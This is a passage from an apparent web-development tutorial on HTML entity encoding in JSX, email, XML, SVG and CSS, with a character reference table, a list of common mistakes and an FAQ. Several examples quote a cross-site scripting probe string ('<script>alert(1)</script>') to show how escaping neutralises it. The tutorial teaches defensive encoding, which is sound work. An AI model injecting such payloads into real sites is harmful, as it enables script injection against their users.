    // React auto-escapes all JSX expressions
    const userInput = '<script>alert("xss")</script>';

    const Comment = () => <p>{userInput}</p>;
    // Renders as: <p>&lt;script&gt;alert("xss")&lt;/script&gt;</p>
    // Browser displays: <script>alert("xss")</script> (as text, not code)

    // dangerouslySetInnerHTML bypasses auto-escaping: use with extreme caution
    const TrustedHtml = ({ html }) => (
      <div dangerouslySetInnerHTML={{ __html: html }} />
    );
    // Only use when html is sanitized by DOMPurify or similar

Using HTML Entities in JSX Source Code

    // In JSX text content, use HTML entity names or numeric codes

    // Option 1: named or numeric entities in JSX text (not inside {})
    const Pricing = () => (
      <p>Price: &euro;49 &mdash; &copy; 2025</p>
    );
    // The JSX compiler decodes entities in JSX text at build time;
    // JSX compiles to JavaScript function calls, not to HTML.

    // Option 2: Unicode escapes in a JS string expression
    const Pricing2 = () => (
      <p>Price: {'\u20AC'}49 {'\u2014'} {'\u00A9'} 2025</p>
    );

    // Option 3: Literal Unicode characters in JSX (requires UTF-8 source file)
    const Pricing3 = () => (
      <p>Price: €49 — © 2025</p>
    );
    // This is the cleanest approach for UTF-8 React projects

    // Entities are NOT decoded inside {} expressions:
    // <span>{'&rarr;'}</span> renders the literal text "&rarr;"
    const Arrow = () => <span>&rarr;</span>;      // renders →
    const Copyright = () => <span>&copy;</span>;  // renders ©

    // Common JSX pitfall: apostrophes in text
    // Valid JSX, but ESLint's react/no-unescaped-entities rule flags it
    // const Bad = () => <p>You're welcome</p>;

    // Options that satisfy the linter:
    const Good1 = () => <p>{"You're welcome"}</p>;  // string expression
    const Good2 = () => <p>You&apos;re welcome</p>; // named entity
    const Good3 = () => <p>You&#39;re welcome</p>;  // numeric entity
    const Good4 = () => <p>You{"’"}re welcome</p>;  // Unicode curly apostrophe

HTML Entities in JSX Attribute Values

    // A quoted JSX attribute (title="...") is a JSX string literal: entities ARE decoded.
    // A braced attribute (title={"..."}) is a JavaScript expression: entities are NOT decoded.

    // WRONG: an HTML entity inside a JS expression stays a literal string
    const BadTitle = () => <div title={"Tom &amp; Jerry"}>...</div>;
    // The title will be "Tom &amp; Jerry" literally, not "Tom & Jerry"!

    // CORRECT: use literal characters or Unicode in JSX attribute values
    const GoodTitle1 = () => <div title="Tom & Jerry">...</div>;   // literal &
    const GoodTitle2 = () => <div title={"Tom & Jerry"}>...</div>; // JS string

    // For aria labels and similar attributes
    const Icon = () => (
      <button aria-label={"Copy to clipboard &rarr;"}> {/* WRONG */}
        Copy
      </button>
    );
    const IconFixed = () => (
      <button aria-label="Copy to clipboard →"> {/* CORRECT */}
        Copy
      </button>
    );

HTML Entities in Email, XML, and Other Contexts

HTML Entities in Email Templates

HTML email has inconsistent and often outdated rendering engines. Entity encoding is critical for email compatibility because many email clients use older HTML parsing engines.

    <!-- HTML Email Best Practices for Entities -->

    <!-- Always encode &, <, >, " in email HTML content -->
    <p>Tom &amp; Jerry Newsletter &mdash; Issue #42</p>

    <!-- Use numeric entities for special characters in email -->
    <!-- Named entities like &mdash; &lsquo; &rsquo; may not be supported in all clients -->
    <p>Tom &amp; Jerry Newsletter &#8212; Issue #42</p> <!-- safer -->

    <!-- Non-breaking spaces are widely supported -->
    <td>100&nbsp;items</td>

    <!-- Emoji in email: use UTF-8 encoding + declare in <head> -->
    <!-- Some clients strip emoji; use text fallbacks -->
    <p>&#127881; Happy New Year! (🎉 if supported)</p>

    <!-- Copyright in email footer -->
    <p>&copy; 2025 Company Name. All rights reserved.</p>
    <p>&#169; 2025 Company Name. All rights reserved.</p> <!-- numeric fallback -->
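
If a template was written with named entities, converting them to the numeric fallbacks recommended above can be automated. The following Python sketch is one possible approach; `named_to_numeric` and `KEEP` are names invented here, and the regular expression only targets simple `&name;` references.

```python
import re
from html.entities import html5

# The five markup-significant references are left untouched.
KEEP = {"amp", "lt", "gt", "quot", "apos"}


def named_to_numeric(markup: str) -> str:
    """Rewrite named references and non-ASCII characters as decimal references."""

    def replace(match: re.Match) -> str:
        name = match.group(1)
        chars = html5.get(f"{name};")
        if name in KEEP or chars is None:
            return match.group(0)  # structural or unknown reference: leave alone
        return "".join(f"&#{ord(c)};" for c in chars)

    converted = re.sub(r"&([A-Za-z][A-Za-z0-9]*);", replace, markup)
    # Remaining literal non-ASCII characters also become numeric references.
    return converted.encode("ascii", "xmlcharrefreplace").decode("ascii")


print(named_to_numeric("<p>Tom &amp; Jerry &mdash; &copy; 2025 café</p>"))
```

Leaving `&amp;`, `&lt;`, and the other structural references alone keeps escaped text escaped, so the conversion cannot introduce markup.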

HTML Entities in XML and SVG

XML is stricter than HTML: it predefines only five entities, and any other named entity must be declared in a DTD before it can be used. Inline SVG inside an HTML document is parsed by the HTML parser, so HTML entity rules apply; SVG in a standalone file is XML and follows XML rules.

<!-- XML predefined entities (the only 5 built-in XML entities) -->
&amp;   <!-- & -->
&lt;    <!-- < -->
&gt;    <!-- > -->
&quot;  <!-- " -->
&apos;  <!-- ' -->

<!-- In XML, other named entities like &copy; &mdash; are NOT defined! -->
<!-- You must use numeric entities or declare them in the DOCTYPE -->
<?xml version="1.0" encoding="UTF-8"?>
<document>
  <text>Copyright &#169; 2025 &#8212; All rights reserved.</text>
  <formula>x &#60; y &#38;&#38; y &#62; 0</formula>
</document>

<!-- SVG text in HTML: HTML entity rules apply -->
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="50">
  <text x="10" y="30">Tom &amp; Jerry &rarr;</text>
</svg>

<!-- SVG as standalone XML file: XML rules apply -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>Tom &amp; Jerry &#8594;</text> <!-- &rarr; not valid in XML! -->
</svg>
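One way to confirm the XML rule is to feed both variants to an XML parser. This sketch uses Python's standard `xml.etree.ElementTree`; the helper name `parses_as_xml` is an assumption made for illustration.

```python
import xml.etree.ElementTree as ET


def parses_as_xml(document):
    """Return True if Python's XML parser accepts the string as well-formed."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False


# Numeric reference: accepted.
print(parses_as_xml("<text>Tom &amp; Jerry &#8594;</text>"))
# HTML-only named entity: rejected as an undefined entity.
print(parses_as_xml("<text>Tom &amp; Jerry &rarr;</text>"))
# The five predefined XML entities: accepted.
print(parses_as_xml("<text>It&apos;s &quot;fine&quot; &lt;ok&gt;</text>"))
```

A check like this is cheap to run in a build step for standalone SVG or XML feeds that are generated from HTML-oriented content.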

HTML Entities in CSS content Property

/* CSS content property: does NOT understand HTML entities */

/* WRONG: HTML entities do not work in CSS */
.icon::before {
  content: '&rarr;'; /* Renders literally as "&rarr;", NOT an arrow! */
}

/* CORRECT: use Unicode escape sequences in CSS */
.icon::before {
  content: '\2192'; /* Unicode escape for → (U+2192) */
}

.copyright::after {
  content: '\00A9'; /* © copyright symbol */
}

.dash::before {
  content: '\2014 '; /* em dash (U+2014) */
}

/* Or embed the actual Unicode character directly */
.check::before {
  content: '✓'; /* Direct Unicode character; works in UTF-8 CSS files */
}

/* Common Unicode values for CSS content */
/* \201C = “ left double quote */
/* \201D = ” right double quote */
/* \2018 = ‘ left single quote */
/* \2019 = ’ right single quote */
/* \2026 = … ellipsis */
/* \00AB = « left guillemet */
/* \00BB = » right guillemet */
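The escape values used in CSS are simply the character's code point in hexadecimal. As a small sketch (the helper name `css_escape` is hypothetical), they can be derived rather than looked up:

```python
def css_escape(char):
    """Return the CSS escape for one character, e.g. the arrow U+2192 -> \\2192."""
    if len(char) != 1:
        raise ValueError("expected exactly one character")
    # A CSS escape is a backslash followed by 1 to 6 hex digits.
    # Four digits are used as a minimum here to match the style shown above.
    return f"\\{ord(char):04X}"


print(css_escape("→"))  # \2192
print(css_escape("©"))  # \00A9
```

If the character after the escape is a hex digit or a space, add a single space after the escape in the stylesheet so the parser knows where the escape ends.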

Complete HTML Special Characters by Category

Punctuation and Typography

| Character | Named | Numeric | Use case |
| --- | --- | --- | --- |
| ‘ | &lsquo; | &#8216; | Left single quotation mark, as in ‘quoted’ |
| ’ | &rsquo; | &#8217; | Right single quotation mark / apostrophe, as in it’s |
| “ | &ldquo; | &#8220; | Left double quotation mark, as in “quoted” |
| ” | &rdquo; | &#8221; | Right double quotation mark, as in “quoted” |
| … | &hellip; | &#8230; | Horizontal ellipsis, as in continued… |
| – | &ndash; | &#8211; | En dash, used in ranges (2010–2020) |
| — | &mdash; | &#8212; | Em dash, for a sentence break or parenthetical |
| « | &laquo; | &#171; | French-style left guillemet, as in «quoted» |
| » | &raquo; | &#187; | French-style right guillemet, as in «quoted» |
| · | &middot; | &#183; | Middle dot (interpunct) |
| • | &bull; | &#8226; | Bullet point |
| § | &sect; | &#167; | Section sign (legal documents) |
| ¶ | &para; | &#182; | Pilcrow / paragraph sign |
| † | &dagger; | &#8224; | Dagger (footnote marker) |
| ‡ | &Dagger; | &#8225; | Double dagger (footnote marker) |

Mathematical Symbols

| Symbol | Named | Numeric | Description |
| --- | --- | --- | --- |
| ± | &plusmn; | &#177; | Plus-minus |
| × | &times; | &#215; | Multiplication |
| ÷ | &divide; | &#247; | Division |
| ≈ | &asymp; | &#8776; | Approximately equal |
| ≠ | &ne; | &#8800; | Not equal |
| ≤ | &le; | &#8804; | Less-than or equal |
| ≥ | &ge; | &#8805; | Greater-than or equal |
| ∞ | &infin; | &#8734; | Infinity |
| √ | &radic; | &#8730; | Square root |
| ∑ | &sum; | &#8721; | Summation |
| ∏ | &prod; | &#8719; | Product |
| ∫ | &int; | &#8747; | Integral |
| ∅ | &empty; | &#8709; | Empty set |
| ∈ | &isin; | &#8712; | Element of |
| ∉ | &notin; | &#8713; | Not element of |
| ∩ | &cap; | &#8745; | Intersection |
| ∪ | &cup; | &#8746; | Union |
| ⊂ | &sub; | &#8834; | Subset of |
| ⊃ | &sup; | &#8835; | Superset of |
| ² | &sup2; | &#178; | Superscript 2 (squared) |
| ³ | &sup3; | &#179; | Superscript 3 (cubed) |
| ¼ | &frac14; | &#188; | Vulgar fraction one quarter |
| ½ | &frac12; | &#189; | Vulgar fraction one half |
| ¾ | &frac34; | &#190; | Vulgar fraction three quarters |

Arrows

| Arrow | Named | Numeric | Description |
| --- | --- | --- | --- |
| ← | &larr; | &#8592; | Leftwards arrow |
| → | &rarr; | &#8594; | Rightwards arrow |
| ↑ | &uarr; | &#8593; | Upwards arrow |
| ↓ | &darr; | &#8595; | Downwards arrow |
| ↔ | &harr; | &#8596; | Left right arrow |
| ⇐ | &lArr; | &#8656; | Leftwards double arrow |
| ⇒ | &rArr; | &#8658; | Rightwards double arrow |
| ⇔ | &hArr; | &#8660; | Left right double arrow |
| ↵ | &crarr; | &#8629; | Downwards arrow with corner leftwards (carriage return) |

Common HTML Entity Mistakes and How to Fix Them

Mistake 1: Forgetting to Encode Ampersands in URLs

<!-- WRONG: the raw & breaks HTML validation and may confuse parsers -->
<a href="https://example.com/api?foo=1&bar=2&baz=3">API Call</a>

<!-- CORRECT: encode & as &amp; in HTML attribute values -->
<a href="https://example.com/api?foo=1&amp;bar=2&amp;baz=3">API Call</a>

<!-- Also wrong in meta refresh -->
<meta http-equiv="refresh" content="0; url=https://example.com?a=1&b=2">

<!-- CORRECT -->
<meta http-equiv="refresh" content="0; url=https://example.com?a=1&amp;b=2">

Mistake 2: Double Encoding

<!-- Double encoding happens when already-encoded text is encoded again -->
<!-- Original text: Tom & Jerry -->
<!-- After first encode: Tom &amp; Jerry -->
<!-- After second encode: Tom &amp;amp; Jerry (WRONG: displays "Tom &amp; Jerry" literally) -->
<!-- This often happens in templating chains where multiple layers encode the same variable -->
<!-- Fix: ensure encoding happens exactly once per output context -->

// JavaScript double encoding prevention

// Minimal encoder for the five HTML-special characters
function encodeHtml(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function safeEncode(str) {
  // First decode any existing entities to avoid double encoding.
  // Caveat: parsing as HTML also drops anything that looks like a tag,
  // so use this only on text that is not expected to contain markup.
  const decoded = new DOMParser()
    .parseFromString(str, 'text/html')
    .documentElement.textContent;
  // Then encode once
  return encodeHtml(decoded);
}

# Python double encoding prevention
import html

def safe_encode(text):
    # Decode first if the text might already be encoded
    decoded = html.unescape(text)
    # Then encode once
    return html.escape(decoded)
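The effect of encoding twice is easy to reproduce with Python's standard `html` module. The detection helper below, `looks_double_encoded`, is a hypothetical heuristic added for illustration; it will also flag text that intentionally discusses entities (such as documentation containing `&amp;lt;`), so treat a positive result as a hint rather than proof.

```python
import html

original = "Tom & Jerry"
once = html.escape(original)
twice = html.escape(once)

print(once)   # Tom &amp; Jerry
print(twice)  # Tom &amp;amp; Jerry


def looks_double_encoded(text):
    """Heuristic: after decoding once, the text still contains decodable entities."""
    decoded_once = html.unescape(text)
    return decoded_once != html.unescape(decoded_once)


print(looks_double_encoded(once))   # False
print(looks_double_encoded(twice))  # True
```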

Mistake 3: Using HTML Entities in CSS content Values

/* WRONG: HTML entities in CSS are treated as literal text */
.arrow::before { content: '&rarr;'; } /* Shows: &rarr; */
.copy::after { content: '&copy;'; } /* Shows: &copy; */

/* CORRECT: use CSS Unicode escapes */
.arrow::before { content: '\2192'; } /* Shows: → */
.copy::after { content: '\00A9'; } /* Shows: © */

/* Or embed actual characters directly (UTF-8 CSS file) */
.arrow::before { content: '→'; }
.copy::after { content: '©'; }

Mistake 4: Not Encoding in JavaScript Contexts

// HTML entities are NOT interpreted inside <script> elements.

// WRONG approach: assuming HTML encoding protects JS contexts.
// If a server template outputs:
// <script>var name = "&lt;script&gt;alert(1)&lt;/script&gt;";</script>
// the JS string contains the literal characters &lt;script&gt;...
// Nothing is injected, but the value is corrupted and the approach is fragile.

// The CORRECT approach: JSON-encode for JS contexts, and also escape "<"
// so the value cannot close the <script> element early.
// In EJS, use the unescaped tag <%- here; <%= would HTML-escape the quotes.
// <script>var name = <%- JSON.stringify(userInput).replace(/</g, '\\u003c') %>;</script>
// => <script>var name = "\u003cscript>alert(1)\u003c/script>";</script>
// The string value is unchanged for JavaScript, and the HTML parser sees no tags.

// Node.js example (Express + EJS); assumes an existing Express `app`
app.get('/profile', (req, res) => {
  res.render('profile', {
    // Pass raw data to the template and encode per context there
    userName: req.user.name,
    // JS context:   <%- JSON.stringify(userName).replace(/</g, '\\u003c') %>
    // HTML context: <%= userName %>  (EJS HTML-escapes <%= output automatically)
  });
});
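The same idea applies to server code in any language. Here is a sketch in Python using only the standard `json` module; the helper name `js_literal` is an assumption, and the extra replacements are there because JSON encoding alone leaves `<`, `>`, and `&` untouched, so a value containing `</script>` could otherwise end an inline script block early.

```python
import json


def js_literal(value):
    """Serialize a value for embedding inside an inline <script> block."""
    encoded = json.dumps(value)  # produces a valid JavaScript literal
    # Swap HTML-significant characters for \uXXXX escapes. JavaScript reads
    # these back as the same characters, but the HTML parser sees no markup.
    return (
        encoded.replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


user_input = "</script><script>alert(1)</script>"
payload = js_literal(user_input)
print(f"<script>var name = {payload};</script>")
```

Because the result is still valid JSON, `json.loads(payload)` returns the original string, which is a convenient way to check that nothing was lost.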

Mistake 5: Using &nbsp; for Visual Spacing

<!-- WRONG: using &nbsp; for visual indentation or spacing -->
<p>&nbsp;&nbsp;&nbsp;Indented text</p>
<p>First line<br>&nbsp;&nbsp;Second indented line</p>
<td>&nbsp;&nbsp;&nbsp;Cell content</td>
<!-- This is fragile, semantically meaningless, and bad for accessibility -->

<!-- CORRECT: use CSS for visual spacing -->
<p style="text-indent: 2em;">Indented text</p>
<p style="padding-left: 2em;">Second indented</p>
<td style="padding-left: 1.5rem;">Cell content</td>

<!-- &nbsp; has legitimate uses: -->
<!-- 1. Prevent a line break between related words -->
<span>Dr.&nbsp;Smith</span> <!-- won't wrap between title and name -->
<span>100&nbsp;km/h</span> <!-- unit won't separate from number -->
<td>No&nbsp;data</td> <!-- prevent "No" and "data" from splitting across lines -->

<!-- 2. Keep an empty table cell from collapsing (legacy HTML) -->
<td>&nbsp;</td>
<!-- Modern alternative: CSS empty-cells or min-height -->

Frequently Asked Questions

What is an HTML entity?

An HTML entity is a string that begins with an ampersand (&) and ends with a semicolon (;), used to represent characters that have special meaning in HTML or that cannot be typed directly. For example, &amp; renders as & and &lt; renders as <. HTML entities exist in two forms: named entities (like &copy; for the copyright symbol) and numeric entities (decimal like &#169; or hexadecimal like &#xA9;).

Why must I encode & < > " in HTML?

These four characters have special syntactic meaning in HTML. The ampersand (&) starts entity references. The less-than sign (<) opens HTML tags. The greater-than sign (>) closes HTML tags. The double quote (") delimits attribute values. If you include these characters literally in HTML content or attributes without encoding them, the browser may misinterpret your HTML structure, causing rendering errors or security vulnerabilities.

What is the difference between named and numeric HTML entities?

Named entities use a mnemonic name (e.g., &copy; for copyright, &nbsp; for non-breaking space). Numeric entities use the Unicode code point in decimal (&#169;) or hexadecimal (&#xA9;). Named entities are more readable but only exist for a subset of characters. Numeric entities work for any Unicode character. Both forms are equally valid in all modern browsers.
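To see the three forms side by side, the sketch below derives them for a given character. The function name `entity_forms` is illustrative, and Python's `html.entities.codepoint2name` table only knows the HTML 4 names, so a character can have an HTML5 name and still show `None` here.

```python
from html.entities import codepoint2name


def entity_forms(char):
    """Return the named, decimal, and hexadecimal references for one character."""
    code = ord(char)
    name = codepoint2name.get(code)  # None when the HTML 4 table has no name
    return {
        "named": f"&{name};" if name else None,
        "decimal": f"&#{code};",
        "hex": f"&#x{code:X};",
    }


print(entity_forms("©"))
# {'named': '&copy;', 'decimal': '&#169;', 'hex': '&#xA9;'}
```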

Does &apos; work in HTML?

&apos; (apostrophe entity) was not part of the original HTML 4 specification but was added in HTML5 and XHTML. It is now universally supported in modern browsers. However, for maximum compatibility with older HTML parsers, many developers use the numeric form &#39; or simply the literal apostrophe character inside double-quoted attributes. In XHTML documents, &apos; has always been valid because XHTML is an XML application.
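Library behavior reflects this history. Python's standard `html` module, for example, avoids the named form when encoding but accepts every form when decoding:

```python
import html

# Encoding: the apostrophe becomes a hexadecimal numeric reference.
print(html.escape("it's"))         # it&#x27;s

# Decoding: named, decimal, and hexadecimal forms all yield an apostrophe.
print(html.unescape("it&apos;s"))  # it's
print(html.unescape("it&#39;s"))   # it's
print(html.unescape("it&#x27;s"))  # it's
```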

What is &nbsp; and when should I use it?

&nbsp; is a non-breaking space character (Unicode U+00A0). Unlike a regular space, it prevents the browser from inserting a line break at that position, and it is not collapsed: consecutive &nbsp; characters each render, whereas runs of regular spaces collapse to one. Use &nbsp; sparingly: for units after numbers (e.g., 100&nbsp;km), to keep names together (e.g., Dr.&nbsp;Smith), or to prevent unwanted wrapping in table cells. Do not use it for layout spacing; use CSS margins and padding instead.

How does HTML entity encoding prevent XSS attacks?

Cross-Site Scripting (XSS) attacks inject malicious HTML or JavaScript into web pages. When user-supplied text is rendered in an HTML context, special characters like < > & " must be encoded as HTML entities before insertion. For example, the script tag <script>alert(1)</script> becomes harmless when the < and > are encoded as &lt; and &gt;: the browser displays it as literal text rather than executing it as HTML. Server-side frameworks handle this automatically when using template escaping, but raw innerHTML assignments in JavaScript bypass these protections.
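As a minimal illustration of output encoding for an HTML text context, the sketch below uses Python's standard `html.escape`. The function name `render_comment` is hypothetical, and a real application would normally rely on its template engine's auto-escaping rather than building markup by hand.

```python
import html


def render_comment(user_text):
    """Wrap untrusted text in a paragraph, escaping it for an HTML text context."""
    return f"<p>{html.escape(user_text)}</p>"


print(render_comment("<script>alert(1)</script>"))
# <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
```

The browser renders the escaped output as visible text, so the injected tag never becomes part of the page structure.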

What is the difference between HTML entity encoding and URL encoding?

HTML entity encoding converts characters using the &name; or &#code; format and is used for embedding text safely in HTML documents. URL encoding (percent encoding) converts characters using the %XX format and is used for encoding data in URIs. They serve different contexts: HTML entities go in HTML files and templates; URL encoding goes in URLs and query strings. A URL inside an HTML attribute often requires both — the URL portion is percent-encoded, and then the HTML attribute value is entity-encoded.
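The two-step order for a URL inside an attribute can be sketched with Python's standard library. The function name `build_link` and the example URL are assumptions for illustration; note that `urlencode` uses form-style encoding, so spaces become `+` rather than `%20`.

```python
import html
from urllib.parse import urlencode


def build_link(base_url, params, label):
    """Percent-encode the query first, then entity-encode the attribute value."""
    url = f"{base_url}?{urlencode(params)}"  # step 1: URL encoding
    # Step 2: HTML encoding of the finished URL and of the link text.
    return f'<a href="{html.escape(url)}">{html.escape(label)}</a>'


print(build_link("https://example.com/search", {"q": "Tom & Jerry", "page": 2}, "Results"))
# <a href="https://example.com/search?q=Tom+%26+Jerry&amp;page=2">Results</a>
```

The ampersand inside the search term becomes `%26` (URL layer), while the ampersand separating the parameters becomes `&amp;` (HTML layer).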

Which HTML entities are required vs optional?

Required: & must always be encoded as &amp; in HTML text and attribute values. < must always be encoded as &lt; in HTML text content. In HTML attribute values delimited by double quotes, " must be encoded as &quot;. In HTML attribute values delimited by single quotes, apostrophes must be encoded as &apos; or &#39;. Optional but recommended: > can be used literally in most HTML text contexts but encoding as &gt; avoids edge cases. All other characters are optional: modern browsers handle the full UTF-8 character set directly, so accented letters, emoji, and symbols can be used as-is when the document declares UTF-8 charset.
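The split between text content and attribute values maps onto the `quote` parameter of Python's `html.escape`. This is a small sketch; the wrapper names `escape_text` and `escape_attribute` are assumptions chosen for readability.

```python
import html


def escape_text(value):
    """Escape for element content: encodes &, <, and > only."""
    return html.escape(value, quote=False)


def escape_attribute(value):
    """Escape for a quoted attribute value: also encodes " and '."""
    return html.escape(value, quote=True)


sample = 'She said "café" & left'
print(escape_text(sample))       # She said "café" &amp; left
print(escape_attribute(sample))  # She said &quot;café&quot; &amp; left
```

In both cases the accented letter passes through unchanged, which matches the rule that non-special characters need no encoding in a UTF-8 document.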

Try the HTML Entity Encoder/Decoder

Encode and decode HTML entities instantly. Supports named entities, decimal, and hexadecimal numeric entities.

Open HTML Entity Tool →